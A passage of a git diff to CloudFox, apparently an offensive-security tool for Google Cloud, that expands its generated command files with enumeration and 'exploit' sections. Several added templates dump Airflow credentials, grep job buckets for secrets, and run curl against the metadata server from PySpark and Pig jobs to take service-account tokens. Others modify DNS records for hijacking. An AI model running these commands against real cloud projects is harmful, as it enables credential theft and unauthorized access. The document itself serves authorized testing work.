-d cloudfox_test\n\n", + env.ServiceAccount, env.DagGcsPrefix, + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, ) } + // Extract Airflow connection credentials + lootFile.Contents += fmt.Sprintf( + "# Dump Airflow connection credentials:\n"+ + "gcloud composer environments run %s --location=%s --project=%s connections list -- -o json\n\n"+ + "# Export specific connection details:\n"+ + "gcloud composer environments run %s --location=%s --project=%s connections get -- \n\n"+ + "# Dump all Airflow variables (may contain secrets):\n"+ + "gcloud composer environments run %s --location=%s --project=%s variables export -- /tmp/variables.json\n\n", + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + env.Name, env.Location, env.ProjectID, + ) + // Airflow Web UI if env.AirflowURI != "" { lootFile.Contents += fmt.Sprintf( - "# Airflow Web UI: %s\n", + "# Airflow Web UI (access via browser with authenticated session):\n"+ + "# %s\n\n", env.AirflowURI, ) } @@ -256,7 +342,7 @@ func (m *ComposerModule) writeHierarchicalOutput(ctx context.Context, logger int var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -280,7 +366,7 @@ func (m *ComposerModule) writeFlatOutput(ctx context.Context, logger internal.Lo var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/costsecurity.go b/gcp/commands/costsecurity.go index 35ca7b47..ee718aec 100644 --- a/gcp/commands/costsecurity.go +++ b/gcp/commands/costsecurity.go @@ -424,13 +424,17 @@ func (m *CostSecurityModule) checkCryptominingIndicators(instance *compute.Insta // Add to loot m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( - "## CRYPTOMINING INDICATOR: %s (Project: %s)\n"+ + "# =============================================================================\n"+ + "# CRYPTOMINING INDICATOR: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ "# Location: %s | Type: %s\n"+ "# Investigate instance:\n"+ "gcloud compute instances describe %s --zone=%s --project=%s\n"+ "# Stop instance if suspicious:\n"+ "gcloud compute instances stop %s --zone=%s --project=%s\n\n", - ind.Name, ind.ProjectID, + ind.Name, + ind.ProjectID, ind.Location, ind.Indicator, ind.Name, ind.Location, ind.ProjectID, ind.Name, ind.Location, ind.ProjectID, @@ -501,11 +505,15 @@ func (m *CostSecurityModule) findOrphanedDisks(ctx context.Context, projectID st // Add cleanup command to loot m.mu.Lock() m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( - "## ORPHANED DISK: %s (Project: %s)\n"+ + "# =============================================================================\n"+ + "# ORPHANED DISK: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ "# Size: %dGB | Est. Cost: $%.2f/month\n"+ "# Delete orphaned disk:\n"+ "gcloud compute disks delete %s --zone=%s --project=%s\n\n", - disk.Name, projectID, + disk.Name, + projectID, disk.SizeGb, estCost, disk.Name, m.extractZoneFromURL(zone), projectID, ) @@ -555,11 +563,15 @@ func (m *CostSecurityModule) findOrphanedIPs(ctx context.Context, projectID stri m.mu.Lock() m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( - "## ORPHANED IP: %s (Project: %s)\n"+ + "# =============================================================================\n"+ + "# ORPHANED IP: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ "# Address: %s | Est. Cost: $%.2f/month\n"+ "# Release static IP:\n"+ "gcloud compute addresses delete %s --region=%s --project=%s\n\n", - addr.Name, projectID, + addr.Name, + projectID, addr.Address, estCost, addr.Name, m.extractRegionFromURL(region), projectID, ) @@ -813,7 +825,7 @@ func (m *CostSecurityModule) estimateDiskCost(sizeGB int64, diskType string) flo func (m *CostSecurityModule) initializeLootFiles() { m.LootMap["cost-security-commands"] = &internal.LootFile{ Name: "cost-security-commands", - Contents: "# Cost Security Commands\n# Generated by CloudFox\n# Review before executing!\n\n", + Contents: "# Cost Security Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } @@ -883,8 +895,14 @@ func (m *CostSecurityModule) buildTables() []internal.TableFile { // Add remediation to loot if a.Remediation != "" { m.LootMap["cost-security-commands"].Contents += fmt.Sprintf( - "## %s: %s (Project: %s)\n# %s\n%s\n\n", - strings.ToUpper(a.AnomalyType), a.Name, a.ProjectID, a.Details, a.Remediation, + "# =============================================================================\n"+ + "# %s: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# %s\n"+ + "%s\n\n", + strings.ToUpper(a.AnomalyType), a.Name, + a.ProjectID, a.Details, a.Remediation, ) } } @@ -949,7 +967,7 @@ func (m *CostSecurityModule) buildTables() []internal.TableFile { func (m *CostSecurityModule) collectLootFiles() []internal.LootFile { var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Review before executing!\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/crossproject.go b/gcp/commands/crossproject.go index 8782ab41..673f7346 100644 --- a/gcp/commands/crossproject.go +++ b/gcp/commands/crossproject.go @@ -229,7 +229,7 @@ func (m *CrossProjectModule) Execute(ctx context.Context, logger internal.Logger func (m *CrossProjectModule) initializeLootFiles() { m.LootMap["crossproject-commands"] = &internal.LootFile{ Name: "crossproject-commands", - Contents: "# Cross-Project Commands\n# Generated by CloudFox\n\n", + Contents: "# Cross-Project Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } @@ -237,11 +237,14 @@ func (m *CrossProjectModule) addBindingToLoot(binding crossprojectservice.CrossP // Only add if there are exploitation commands if len(binding.ExploitCommands) > 0 { m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( - "### %s -> %s (%s)\n", + "# =============================================================================\n"+ + "# %s -> %s (%s)\n"+ + "# =============================================================================\n", m.GetProjectName(binding.SourceProject), m.GetProjectName(binding.TargetProject), cleanRole(binding.Role), ) + m.LootMap["crossproject-commands"].Contents += "\n# === EXPLOIT COMMANDS ===\n\n" for _, cmd := range binding.ExploitCommands { m.LootMap["crossproject-commands"].Contents += cmd + "\n" } @@ -264,11 +267,14 @@ func (m *CrossProjectModule) addLateralMovementToLoot(path crossprojectservice.L } m.LootMap["crossproject-commands"].Contents += fmt.Sprintf( - "### %s -> %s (%s)\n", + "# =============================================================================\n"+ + "# %s -> %s (%s)\n"+ + "# =============================================================================\n", m.GetProjectName(path.SourceProject), m.GetProjectName(path.TargetProject), strings.Join(cleanedRoles, ", "), ) + m.LootMap["crossproject-commands"].Contents += "\n# === EXPLOIT COMMANDS ===\n\n" for _, cmd := range path.ExploitCommands { m.LootMap["crossproject-commands"].Contents += cmd + "\n" } @@ -414,7 +420,7 @@ func (m *CrossProjectModule) getAttackPathForTarget(targetProject, principal str func (m *CrossProjectModule) collectLootFiles() []internal.LootFile { var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/dataexfiltration.go b/gcp/commands/dataexfiltration.go index 2655a81f..3475c8db 100755 --- a/gcp/commands/dataexfiltration.go +++ b/gcp/commands/dataexfiltration.go @@ -438,7 +438,7 @@ func (m *DataExfiltrationModule) initializeLootForProject(projectID string) { m.LootMap[projectID] = make(map[string]*internal.LootFile) m.LootMap[projectID]["data-exfiltration-commands"] = &internal.LootFile{ Name: "data-exfiltration-commands", - Contents: "# Data Exfiltration Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + Contents: "# Data Exfiltration Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } } @@ -565,14 +565,17 @@ func (m *DataExfiltrationModule) generatePlaybookForProject(projectID string) *i var sb strings.Builder sb.WriteString("# GCP Data Exfiltration Commands\n") sb.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) - sb.WriteString("# Generated by CloudFox\n\n") + sb.WriteString("# Generated by CloudFox\n") + sb.WriteString("# WARNING: Only use with proper authorization\n\n") // Actual misconfigurations for this project paths := m.ProjectExfiltrationPaths[projectID] if len(paths) > 0 { - sb.WriteString("## Actual Misconfigurations\n\n") + sb.WriteString("# === ACTUAL MISCONFIGURATIONS ===\n\n") for _, path := range paths { - sb.WriteString(fmt.Sprintf("### %s: %s\n", path.PathType, path.ResourceName)) + sb.WriteString(fmt.Sprintf("# =============================================================================\n"+ + "# %s: %s\n"+ + "# =============================================================================\n", path.PathType, path.ResourceName)) sb.WriteString(fmt.Sprintf("# Description: %s\n", path.Description)) if path.ExploitCommand != "" { sb.WriteString(path.ExploitCommand) @@ -601,11 +604,13 @@ func (m *DataExfiltrationModule) generatePlaybookForProject(projectID string) *i } if !hasFindings { - sb.WriteString("## Permission-Based Exfiltration Commands\n\n") + sb.WriteString("# === PERMISSION-BASED EXFILTRATION COMMANDS ===\n\n") hasFindings = true } - sb.WriteString(fmt.Sprintf("### %s (%s)\n", finding.Permission, finding.Service)) + sb.WriteString(fmt.Sprintf("# =============================================================================\n"+ + "# %s (%s)\n"+ + "# =============================================================================\n", finding.Permission, finding.Service)) sb.WriteString(fmt.Sprintf("# %s\n\n", finding.Description)) for _, p := range relevantPrincipals { @@ -645,7 +650,7 @@ func (m *DataExfiltrationModule) generatePlaybookForProject(projectID string) *i contents := sb.String() // Don't return empty loot file - if contents == fmt.Sprintf("# GCP Data Exfiltration Commands\n# Project: %s\n# Generated by CloudFox\n\n", projectID) { + if contents == fmt.Sprintf("# GCP Data Exfiltration Commands\n# Project: %s\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", projectID) { return nil } @@ -1240,12 +1245,12 @@ func (m *DataExfiltrationModule) addExfiltrationPathToLoot(projectID string, pat } lootFile.Contents += fmt.Sprintf( - "#############################################\n"+ - "## [ACTUAL] %s: %s\n"+ - "## Project: %s\n"+ - "## Description: %s\n"+ - "## Destination: %s\n"+ - "#############################################\n", + "# =============================================================================\n"+ + "# [ACTUAL] %s: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Description: %s\n"+ + "# Destination: %s\n", path.PathType, path.ResourceName, path.ProjectID, @@ -1606,7 +1611,7 @@ func (m *DataExfiltrationModule) writeHierarchicalOutput(ctx context.Context, lo var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization!\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -1660,7 +1665,7 @@ func (m *DataExfiltrationModule) writeFlatOutput(ctx context.Context, logger int var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization!\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/dataflow.go b/gcp/commands/dataflow.go index 1f816a58..a2a5c31b 100644 --- a/gcp/commands/dataflow.go +++ b/gcp/commands/dataflow.go @@ -133,30 +133,91 @@ func (m *DataflowModule) addToLoot(projectID string, job dataflowservice.JobInfo return } lootFile.Contents += fmt.Sprintf( - "## Job: %s (Project: %s, Location: %s)\n"+ + "# =============================================================================\n"+ + "# DATAFLOW JOB: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Location: %s\n"+ "# ID: %s\n"+ "# Type: %s\n"+ "# State: %s\n"+ "# Service Account: %s\n"+ "# Public IPs: %v\n"+ - "# Workers: %d\n\n"+ - "# Describe job:\n"+ - "gcloud dataflow jobs describe %s --project=%s --region=%s\n"+ - "# Show job details:\n"+ - "gcloud dataflow jobs show %s --project=%s --region=%s\n"+ - "# Cancel job (if running):\n"+ - "gcloud dataflow jobs cancel %s --project=%s --region=%s\n\n", + "# Workers: %d\n", job.Name, job.ProjectID, job.Location, - job.ID, - job.Type, - job.State, - job.ServiceAccount, - job.UsePublicIPs, - job.NumWorkers, + job.ID, job.Type, job.State, + job.ServiceAccount, job.UsePublicIPs, job.NumWorkers, + ) + + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe job: +gcloud dataflow jobs describe %s --project=%s --region=%s + +# Show job details: +gcloud dataflow jobs show %s --project=%s --region=%s + +# List all Dataflow jobs: +gcloud dataflow jobs list --project=%s --region=%s + +# Get job metrics: +gcloud dataflow metrics list %s --project=%s --region=%s + +`, job.ID, job.ProjectID, job.Location, job.ID, job.ProjectID, job.Location, + job.ProjectID, job.Location, job.ID, job.ProjectID, job.Location, ) + + // Bucket inspection + if job.TempLocation != "" { + lootFile.Contents += fmt.Sprintf( + "# Inspect temp bucket (may contain intermediate data):\n"+ + "gsutil ls -r %s\n\n", + job.TempLocation, + ) + } + if job.StagingLocation != "" { + lootFile.Contents += fmt.Sprintf( + "# Inspect staging bucket (contains job artifacts):\n"+ + "gsutil ls -r %s\n\n", + job.StagingLocation, + ) + } + + // === EXPLOIT COMMANDS === + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + + lootFile.Contents += fmt.Sprintf( + "# Cancel running job:\n"+ + "gcloud dataflow jobs cancel %s --project=%s --region=%s\n\n"+ + "# Drain running job (graceful stop):\n"+ + "gcloud dataflow jobs drain %s --project=%s --region=%s\n\n"+ + "# Submit a new Dataflow job (code execution as SA: %s):\n"+ + "# Template-based job:\n"+ + "gcloud dataflow jobs run cloudfox-test --gcs-location=gs://dataflow-templates/latest/Word_Count --region=%s --project=%s --parameters=inputFile=gs://BUCKET/input.txt,output=gs://BUCKET/output\n\n"+ + "# Flex template job (custom container = full code execution):\n"+ + "gcloud dataflow flex-template run cloudfox-flex --template-file-gcs-location=gs://YOUR_BUCKET/template.json --region=%s --project=%s --service-account-email=%s\n\n", + job.ID, job.ProjectID, job.Location, + job.ID, job.ProjectID, job.Location, + job.ServiceAccount, + job.Location, job.ProjectID, + job.Location, job.ProjectID, job.ServiceAccount, + ) + + // Inspect staging/temp for secrets + if job.TempLocation != "" || job.StagingLocation != "" { + lootFile.Contents += "# Search job buckets for secrets/credentials:\n" + if job.TempLocation != "" { + lootFile.Contents += fmt.Sprintf("gsutil cat %s/** 2>/dev/null | grep -iE '(password|secret|token|key|credential)'\n", job.TempLocation) + } + if job.StagingLocation != "" { + lootFile.Contents += fmt.Sprintf("gsutil cat %s/** 2>/dev/null | grep -iE '(password|secret|token|key|credential)'\n", job.StagingLocation) + } + lootFile.Contents += "\n" + } } func (m *DataflowModule) writeOutput(ctx context.Context, logger internal.Logger) { @@ -192,10 +253,12 @@ func (m *DataflowModule) jobsToTableBody(jobs []dataflowservice.JobInfo) [][]str // Check attack paths (privesc/exfil/lateral) for the service account attackPaths := "run foxmapper" - if job.ServiceAccount != "" && m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { - attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, job.ServiceAccount) - } else { - attackPaths = "No" + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + if job.ServiceAccount != "" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, job.ServiceAccount) + } else { + attackPaths = "No" + } } body = append(body, []string{ diff --git a/gcp/commands/dataproc.go b/gcp/commands/dataproc.go index 1fa95bba..85e6fbaa 100644 --- a/gcp/commands/dataproc.go +++ b/gcp/commands/dataproc.go @@ -118,7 +118,7 @@ func (m *DataprocModule) processProject(ctx context.Context, projectID string, l m.LootMap[projectID] = make(map[string]*internal.LootFile) m.LootMap[projectID]["dataproc-commands"] = &internal.LootFile{ Name: "dataproc-commands", - Contents: "# Dataproc Commands\n# Generated by CloudFox\n\n", + Contents: "# Dataproc Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } @@ -135,16 +135,44 @@ func (m *DataprocModule) addToLoot(projectID string, cluster dataprocservice.Clu } lootFile.Contents += fmt.Sprintf( - "# %s (%s)\n"+ - "# Project: %s\n", - cluster.Name, cluster.Region, - cluster.ProjectID, + "# =============================================================================\n"+ + "# DATAPROC CLUSTER: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n"+ + "# Region: %s\n"+ + "# State: %s\n"+ + "# Service Account: %s\n"+ + "# Public IPs: %s\n"+ + "# Kerberos: %s\n", + cluster.Name, cluster.ProjectID, cluster.Region, + cluster.State, cluster.ServiceAccount, + shared.BoolToYesNo(!cluster.InternalIPOnly), + shared.BoolToYesNo(cluster.KerberosEnabled), ) - // gcloud commands - lootFile.Contents += fmt.Sprintf( - "gcloud dataproc clusters describe %s --region=%s --project=%s\n"+ - "gcloud dataproc jobs list --cluster=%s --region=%s --project=%s\n", + if len(cluster.MasterInstanceNames) > 0 { + lootFile.Contents += fmt.Sprintf("# Master Instances: %s\n", strings.Join(cluster.MasterInstanceNames, ", ")) + } + + // === ENUMERATION COMMANDS === + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe cluster: +gcloud dataproc clusters describe %s --region=%s --project=%s + +# List jobs on this cluster: +gcloud dataproc jobs list --cluster=%s --region=%s --project=%s + +# Get cluster IAM policy: +gcloud dataproc clusters get-iam-policy %s --region=%s --project=%s + +# List cluster metadata/properties: +gcloud dataproc clusters describe %s --region=%s --project=%s --format=json | jq '.config.softwareConfig.properties' + +`, + cluster.Name, cluster.Region, cluster.ProjectID, + cluster.Name, cluster.Region, cluster.ProjectID, cluster.Name, cluster.Region, cluster.ProjectID, cluster.Name, cluster.Region, cluster.ProjectID, ) @@ -152,18 +180,82 @@ func (m *DataprocModule) addToLoot(projectID string, cluster dataprocservice.Clu // Bucket commands if cluster.ConfigBucket != "" { lootFile.Contents += fmt.Sprintf( - "gsutil ls gs://%s/\n", + "# List config bucket (may contain init scripts with secrets):\n"+ + "gsutil ls -r gs://%s/\n"+ + "# Download init actions (check for hardcoded credentials):\n"+ + "gsutil -m cp -r gs://%s/google-cloud-dataproc-metainfo/ /tmp/dataproc-config-%s/\n\n", cluster.ConfigBucket, + cluster.ConfigBucket, cluster.Name, ) } if cluster.TempBucket != "" { lootFile.Contents += fmt.Sprintf( - "gsutil ls gs://%s/\n", + "# List temp bucket (may contain job output/data):\n"+ + "gsutil ls -r gs://%s/\n\n", cluster.TempBucket, ) } - lootFile.Contents += "\n" + // === EXPLOIT COMMANDS === + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + + // SSH to master node + if len(cluster.MasterInstanceNames) > 0 { + masterName := cluster.MasterInstanceNames[0] + lootFile.Contents += fmt.Sprintf( + "# SSH to master node (runs as cluster SA: %s):\n"+ + "gcloud compute ssh %s --project=%s --zone=ZONE\n\n"+ + "# SSH through IAP (if direct SSH blocked):\n"+ + "gcloud compute ssh %s --tunnel-through-iap --project=%s --zone=ZONE\n\n", + cluster.ServiceAccount, + masterName, cluster.ProjectID, + masterName, cluster.ProjectID, + ) + } else { + lootFile.Contents += fmt.Sprintf( + "# SSH to master node:\n"+ + "gcloud compute ssh %s-m --project=%s --zone=ZONE\n\n"+ + "# SSH through IAP (if direct SSH blocked):\n"+ + "gcloud compute ssh %s-m --tunnel-through-iap --project=%s --zone=ZONE\n\n", + cluster.Name, cluster.ProjectID, + cluster.Name, cluster.ProjectID, + ) + } + + // Submit jobs for code execution + lootFile.Contents += fmt.Sprintf( + "# Submit PySpark job for code execution (runs as SA: %s):\n"+ + "cat > /tmp/cloudfox_spark.py << 'SPARKEOF'\n"+ + "import subprocess, json\n"+ + "result = subprocess.run(['curl', '-s', '-H', 'Metadata-Flavor: Google',\n"+ + " 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'],\n"+ + " capture_output=True, text=True)\n"+ + "print(json.loads(result.stdout))\n"+ + "SPARKEOF\n"+ + "gcloud dataproc jobs submit pyspark /tmp/cloudfox_spark.py --cluster=%s --region=%s --project=%s\n\n"+ + "# Submit Spark job:\n"+ + "gcloud dataproc jobs submit spark --cluster=%s --region=%s --project=%s --class=MAIN_CLASS --jars=JAR_PATH\n\n"+ + "# Submit Hive query (access HDFS/HBase data):\n"+ + "gcloud dataproc jobs submit hive --cluster=%s --region=%s --project=%s --execute=\"SHOW DATABASES; SHOW TABLES;\"\n\n"+ + "# Submit Pig job:\n"+ + "gcloud dataproc jobs submit pig --cluster=%s --region=%s --project=%s --execute=\"sh curl -s http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token -H Metadata-Flavor:Google\"\n\n", + cluster.ServiceAccount, + cluster.Name, cluster.Region, cluster.ProjectID, + cluster.Name, cluster.Region, cluster.ProjectID, + cluster.Name, cluster.Region, cluster.ProjectID, + cluster.Name, cluster.Region, cluster.ProjectID, + ) + + // Access web UIs + lootFile.Contents += fmt.Sprintf( + "# Access Hadoop/Spark Web UIs (via SSH tunnel or component gateway):\n"+ + "# YARN ResourceManager: http://:8088\n"+ + "# HDFS NameNode: http://:9870\n"+ + "# Spark History: http://:18080\n"+ + "# Create SSH tunnel to YARN UI:\n"+ + "gcloud compute ssh %s-m --project=%s --zone=ZONE -- -L 8088:localhost:8088 -N\n\n", + cluster.Name, cluster.ProjectID, + ) } func (m *DataprocModule) writeOutput(ctx context.Context, logger internal.Logger) { @@ -273,7 +365,7 @@ func (m *DataprocModule) writeHierarchicalOutput(ctx context.Context, logger int var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -299,7 +391,7 @@ func (m *DataprocModule) writeFlatOutput(ctx context.Context, logger internal.Lo var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/dns.go b/gcp/commands/dns.go index d720f625..2172faed 100644 --- a/gcp/commands/dns.go +++ b/gcp/commands/dns.go @@ -191,14 +191,17 @@ func (m *DNSModule) processProject(ctx context.Context, projectID string, logger m.LootMap[projectID] = make(map[string]*internal.LootFile) m.LootMap[projectID]["dns-commands"] = &internal.LootFile{ Name: "dns-commands", - Contents: "# Cloud DNS Commands\n# Generated by CloudFox\n\n", + Contents: "# Cloud DNS Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } + m.mu.Unlock() for _, zone := range zones { + m.mu.Lock() m.addZoneToLoot(projectID, zone) + m.mu.Unlock() - // Get records for each zone + // Get records for each zone (outside of lock to avoid holding mutex across API call) records, err := ds.Records(projectID, zone.Name) if err != nil { m.CommandCounter.Error++ @@ -210,6 +213,7 @@ func (m *DNSModule) processProject(ctx context.Context, projectID string, logger projectRecords = append(projectRecords, records...) } + m.mu.Lock() m.ProjectZones[projectID] = zones m.ProjectRecords[projectID] = projectRecords m.mu.Unlock() @@ -229,21 +233,70 @@ func (m *DNSModule) addZoneToLoot(projectID string, zone DNSService.ZoneInfo) { } lootFile.Contents += fmt.Sprintf( - "# %s (%s)\n"+ - "# Project: %s | Visibility: %s\n", + "# =============================================================================\n"+ + "# DNS ZONE: %s (%s)\n"+ + "# =============================================================================\n"+ + "# Project: %s, Visibility: %s\n", zone.Name, zone.DNSName, zone.ProjectID, zone.Visibility, ) - // gcloud commands + lootFile.Contents += fmt.Sprintf(` +# === ENUMERATION COMMANDS === + +# Describe zone: +gcloud dns managed-zones describe %s --project=%s + +# List all record sets: +gcloud dns record-sets list --zone=%s --project=%s + +# Export all records (for offline analysis): +gcloud dns record-sets export /tmp/dns-%s.zone --zone=%s --project=%s + +# List DNSSEC config: +gcloud dns managed-zones describe %s --project=%s --format=json | jq '.dnssecConfig' + +`, zone.Name, zone.ProjectID, + zone.Name, zone.ProjectID, + zone.Name, zone.Name, zone.ProjectID, + zone.Name, zone.ProjectID, + ) + + // === EXPLOIT COMMANDS === + lootFile.Contents += "# === EXPLOIT COMMANDS ===\n\n" + + // DNS validation and takeover checks lootFile.Contents += fmt.Sprintf( - "gcloud dns managed-zones describe %s --project=%s\n"+ - "gcloud dns record-sets list --zone=%s --project=%s\n", + "# Validate DNS resolution for the zone:\n"+ + "dig %s ANY +short\n"+ + "nslookup %s\n\n"+ + "# Check for dangling CNAME records (subdomain takeover):\n"+ + "gcloud dns record-sets list --zone=%s --project=%s --filter=\"type=CNAME\" --format=\"table(name,rrdatas)\"\n\n"+ + "# Test each CNAME for dangling records:\n"+ + "# for cname in $(gcloud dns record-sets list --zone=%s --project=%s --filter=\"type=CNAME\" --format=\"value(rrdatas)\"); do\n"+ + "# echo -n \"$cname: \"; dig +short $cname || echo \"DANGLING - potential takeover!\"\n"+ + "# done\n\n"+ + "# Check NS records (for delegation attacks):\n"+ + "dig %s NS +short\n\n", + zone.DNSName, zone.DNSName, zone.Name, zone.ProjectID, zone.Name, zone.ProjectID, + zone.DNSName, ) - lootFile.Contents += "\n" + // Zone modification commands + lootFile.Contents += fmt.Sprintf( + "# Add a DNS record (requires dns.changes.create):\n"+ + "gcloud dns record-sets create test.%s --zone=%s --type=A --ttl=300 --rrdatas=YOUR_IP --project=%s\n\n"+ + "# Modify existing record (DNS hijacking):\n"+ + "gcloud dns record-sets update www.%s --zone=%s --type=A --ttl=300 --rrdatas=YOUR_IP --project=%s\n\n", + zone.DNSName, zone.Name, zone.ProjectID, + zone.DNSName, zone.Name, zone.ProjectID, + ) + + if zone.Visibility == "public" { + lootFile.Contents += "# [FINDING] This is a PUBLIC zone - records are resolvable from the internet\n\n" + } } // ------------------------------ @@ -412,7 +465,7 @@ func (m *DNSModule) writeHierarchicalOutput(ctx context.Context, logger internal var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -449,7 +502,7 @@ func (m *DNSModule) writeFlatOutput(ctx context.Context, logger internal.Logger) var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/filestore.go b/gcp/commands/filestore.go index 231d9900..374e67de 100644 --- a/gcp/commands/filestore.go +++ b/gcp/commands/filestore.go @@ -78,7 +78,7 @@ func (m *FilestoreModule) processProject(ctx context.Context, projectID string, m.LootMap[projectID] = make(map[string]*internal.LootFile) m.LootMap[projectID]["filestore-commands"] = &internal.LootFile{ Name: "filestore-commands", - Contents: "# Filestore Commands\n# Generated by CloudFox\n\n", + Contents: "# Filestore Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } m.mu.Unlock() @@ -112,9 +112,9 @@ func (m *FilestoreModule) addToLoot(projectID string, instance filestoreservice. } lootFile.Contents += fmt.Sprintf( - "# ==========================================\n"+ + "# =============================================================================\n"+ "# Instance: %s\n"+ - "# ==========================================\n"+ + "# =============================================================================\n"+ "# Location: %s\n"+ "# Project: %s\n"+ "# Protocol: %s\n"+ @@ -141,9 +141,9 @@ func (m *FilestoreModule) addToLoot(projectID string, instance filestoreservice. if len(instance.Shares) > 0 && len(instance.IPAddresses) > 0 { for _, share := range instance.Shares { lootFile.Contents += fmt.Sprintf( - "# ------------------------------------------\n"+ + "# -----------------------------------------------------------------------------\n"+ "# Share: %s (%d GB)\n"+ - "# ------------------------------------------\n", + "# -----------------------------------------------------------------------------\n", share.Name, share.CapacityGB, ) @@ -346,7 +346,7 @@ func (m *FilestoreModule) writeHierarchicalOutput(ctx context.Context, logger in var lootFiles []internal.LootFile if projectLoot, ok := m.LootMap[projectID]; ok { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -379,7 +379,7 @@ func (m *FilestoreModule) writeFlatOutput(ctx context.Context, logger internal.L var lootFiles []internal.LootFile for _, projectLoot := range m.LootMap { for _, loot := range projectLoot { - if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot != nil && 